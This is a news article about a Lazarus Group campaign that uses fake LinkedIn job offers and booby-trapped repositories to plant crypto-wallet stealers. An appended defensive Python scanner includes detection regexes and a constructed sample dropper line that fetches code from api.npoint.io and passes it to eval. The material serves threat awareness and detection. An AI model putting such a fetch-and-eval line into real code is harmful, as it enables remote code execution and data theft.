The notorious North Korea-linked Lazarus Group has launched a sophisticated cross-platform cyberattack that exploits fake LinkedIn job offers to infiltrate Windows, macOS, and Linux systems. This latest campaign specifically targets professionals in the cryptocurrency and travel sectors, using social engineering tactics to deploy a powerful JavaScript-based information stealer.
How the Lazarus Group's Scam Unfolds
According to cybersecurity firm Bitdefender, the attack begins with fraudulent job offers sent via LinkedIn. Victims are lured with promises of remote work, flexible hours, and high salaries.
Once the target expresses interest, the fake recruiter requests a CV or a GitHub repository link, which serves as an entry point to gather personal data and make the scam appear legitimate.
The next stage of the attack involves sharing a GitHub or Bitbucket repository containing a supposed Minimum Viable Product (MVP) of a decentralized exchange (DEX) project. The victim is encouraged to review the project and provide feedback.
Hidden Malware Within the Code
Buried within the repository's code is an obfuscated JavaScript script that fetches a next-stage payload from api.npoint[.]io. This malicious script functions as a:
JavaScript information stealer, harvesting data from cryptocurrency wallet extensions installed on the victim's browser.
Malware loader, which deploys a Python-based backdoor designed to monitor clipboard activity, maintain persistent remote access, and drop additional malware.
Connection to Contagious Interview Malware Cluster
Bitdefender researchers have identified tactical overlaps between this campaign and the well-documented Contagious Interview cluster (aka DeceptiveDevelopment, DEV#POPPER). This attack chain has been linked to malware strains such as:
BeaverTail (JavaScript Stealer) – Extracts sensitive browser data before executing further payloads.
InvisibleFerret (Python Implant) – Functions as a stealthy backdoor for prolonged system compromise.
Multi-Layered Infection Chain
The Lazarus Group employs an advanced multi-layered infection technique, leveraging different programming languages and technologies:
JavaScript Stealer – Extracts crypto wallet data and browser information.
Python-Based Malware – Installs a .NET binary that communicates with a TOR-based command-and-control (C2) server.
Crypto Miner Deployment – The malware ultimately delivers a payload that steals sensitive data, logs keystrokes, and launches cryptocurrency mining operations.
Widespread Impact and Evolution of the Campaign
Reports from LinkedIn and Reddit suggest that this campaign is rapidly evolving. Attackers modify their tactics slightly for each victim, sometimes asking them to clone a Web3 repository or debug faulty code as part of a fake hiring process.
A now-deleted Bitbucket repository linked to the campaign was labeled "miketoken_v2." Bitdefender believes that Lazarus is recycling repository names and recruiter identities to keep the attack active and evade detection.
New Malware Variant: FlexibleFerret
This disclosure comes just a day after SentinelOne reported that the Contagious Interview campaign is also deploying a new malware variant, FlexibleFerret, further demonstrating Lazarus Group's continuous adaptation and evolution in their cyberattacks.
Protect Yourself Against Lazarus Group’s Cyber Threats
To stay secure from these highly targeted cryptocurrency-related cyberattacks, cybersecurity experts recommend:
Verifying job offers – Be skeptical of recruiters requesting sensitive data or GitHub repositories.
Avoiding unverified repositories – Do not download or execute code from unknown sources.
Using advanced security tools – Enable multi-factor authentication (MFA) and keep security software updated.
Monitoring clipboard activity – Cybercriminals often exploit clipboard data to steal crypto wallet credentials.
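A pre-review triage check for the "unverified repositories" advice above, added here as an example rather than tooling from Bitdefender, SentinelOne or the campaign itself: it walks a cloned repo's JavaScript/TypeScript files and flags a literal fetch to the next-stage host named in the write-up (api.npoint[.]io) and the fetch-then-eval pattern of a dropper. The regexes, file extensions and the two constructed sample sources are assumptions; a clean result is not proof of safety, only a reason to keep reading before running anything.

```python
import re
from pathlib import Path

# Indicator from the campaign write-up above: the next-stage host api.npoint[.]io
# (written un-defanged here so it matches source text). Extend with your own IOCs.
SUSPICIOUS_HOSTS = {"api.npoint.io"}

# Network calls with a literal URL; group 1 captures the host.
FETCH_RE = re.compile(
    r"""\b(?:fetch|axios(?:\.get|\.post)?|https?\.(?:get|request)|request)\s*\(\s*["'`]https?://([^"'`/]+)""",
    re.I)
# Dynamic code evaluation used by droppers to run what they just downloaded.
DYNAMIC_EVAL_RE = re.compile(r"\b(?:eval|new\s+Function|vm\.runInThisContext)\s*\(")
# Cheap obfuscation tells: long \xNN runs, char-code assembly, base64 decoding.
OBFUSCATION_RE = re.compile(r"(?:\\x[0-9a-f]{2}){16,}|String\.fromCharCode\s*\(|\batob\s*\(", re.I)

def scan_source(text):
    """Return (reason, detail) findings for one JavaScript/TypeScript source text."""
    findings = []
    hosts = {m.group(1).lower() for m in FETCH_RE.finditer(text)}
    for host in sorted(hosts & SUSPICIOUS_HOSTS):
        findings.append(("known-stager-host", host))
    if hosts and DYNAMIC_EVAL_RE.search(text):
        findings.append(("remote-fetch-plus-dynamic-eval", ", ".join(sorted(hosts))))
    if OBFUSCATION_RE.search(text):
        findings.append(("obfuscation-indicator", "hex/charcode/base64 assembly"))
    return findings

def scan_repo(root):
    """Walk a cloned repo (skipping node_modules) and map file -> findings."""
    results = {}
    for path in Path(root).rglob("*"):
        if path.suffix in {".js", ".cjs", ".mjs", ".ts"} and "node_modules" not in path.parts:
            found = scan_source(path.read_text(errors="ignore"))
            if found:
                results[str(path.relative_to(root))] = found
    return results

# Constructed sample resembling the dropper pattern described above; not real malware.
SAMPLE_DROPPER = (
    'const cfg = require("./config");\n'
    'fetch("https://api.npoint.io/CONSTRUCTED-ID").then(r => r.text())\n'
    '  .then(code => eval(code));\n'
)
# Constructed benign file: a literal URL to a reserved example domain, no dynamic evaluation.
SAMPLE_BENIGN = 'const res = await fetch("https://example.com/api/ping");\n'

if __name__ == "__main__":
    import sys
    for name, hits in scan_repo(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(name, hits)
```

Run it against the clone directory before opening the project in an IDE or running npm install, since either step can execute repository code.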
The Lazarus Group continues to innovate and refine its attack methodologies, making it essential for individuals and organizations to remain vigilant against social engineering and malware threats in the cryptocurrency space.